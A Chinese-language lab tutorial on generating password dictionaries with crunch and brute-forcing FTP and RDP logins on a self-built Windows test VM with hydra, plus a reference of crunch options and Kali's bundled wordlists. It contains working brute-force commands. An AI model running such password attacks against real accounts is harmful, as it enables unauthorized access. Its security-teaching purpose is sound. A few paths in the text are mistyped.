自写密码字典-解口令具体过程(海德拉）

本次实验应用kali（crunch创建 hydra工具进行破解）

一.本文仅限于学习，以下操作仅测试使用，切勿用于生产环境。

1.过程准备一台kali虚拟机，一台win（IP：192.168.174.135)（充当服务器）

2.在win上搭建ftp服务器（win用户名：administrator 密码：123456）

3.在kali的root模式下进行

4.先创建密码字典（结尾有更多crunch创建密码字典的用法）

完成一下6位数字密码字典的制作：

crunch 6 6 -f /usr/share/crunch/charset.lst numeric -s 111111 -o password.txt

此时得到一个从111111-999999的密码字典命名为password.txt

5.使用密码字典password.txt进行爆破

hydra -l administrator -P password.txt ftp://192.168.174.135  //ftp协议用法

hydra -l administrator -P pass123.txt 192.168.174.135 rdp    //rdp是远程控制协议

crunch 是创建密码字典工具，按照指定的规则生成密码字典，可以根据情况灵活的生成字典

# crunch -help                                                    

crunch version 3.6

options
-b     指定文件输出的大小，避免字典文件过大  
-c     指定文件输出的行数，即包含密码的个数
-d     限制相同元素出现的次数
-e     定义停止字符，即到该字符串就停止生成
-f     调用库文件（/etc/share/crunch/charset.lst）
-i     改变输出格式，即aaa,aab -> aaa,baa
-I     通常与-t联合使用，表明该字符为实义字符
-m     通常与-p搭配
-o     将密码保存到指定文件
-p     指定元素以组合的方式进行
-q     读取密码文件，即读取pass.txt
-r     定义重某一字符串重新开始
-s     指定一个开始的字符，即从自己定义的密码xxxx开始
-t     指定密码输出的格式
-u     禁止打印百分比（必须为最后一个选项）
-z     压缩生成的字典文件，支持gzip,bzip2,lzma,7z  

特殊字符

%      代表数字
^      代表特殊符号
@      代表小写字母
,      代表大写字符

密码库

/usr/share/crunch/charset.lst

numeric     表示0123456789
Lalpha      表示26位小写字母
Ualpha      表示26位大写字母

例子：

（1）生成pass01-pass99所有数字组合

$ crunch 6 6 -t pass%%  >>newpwd.txt

（2）生成六位小写字母密码，其中前四位为pass

$ crunch 6 6 -t pass@@  >>newpwd.txt

（3）生成六位密码，其中前四位为pass，后二位为大写

$ crunch 6 6 -t pass,,  >>newpwd.txt

（4）生成六位密码，其中前四位为pass，后二位为特殊字符

$ crunch 6 6 -t pass^^  >>newpwd.txt

（5）.制作8位数字字典

$ crunch 8 8 charset.lst numeric -o num8.dic

 （6）制作139开头的手机密码字典

$ crunch 11 11  +0123456789 -t 139%%%%%%%% -b 20mib -o START

完成一下6位数字密码字典的制作：

crunch  6 6 -f /usr/share/crunch/charset.lst numeric -s 111111 -o password.txt

二.KALI自带密码字典

在/use/share/wordlists目录下有许多自带的强大字典可以让我们去使用

big.txt	大的字典
small.txt	小的字典
catala.txt	项目配置字典
common.txt	公共字典
euskera.txt	数据目录字典
others.txt	扩展目录，默认用户名等字典
indexes.txt	首页字典
还有许多其他的查看百度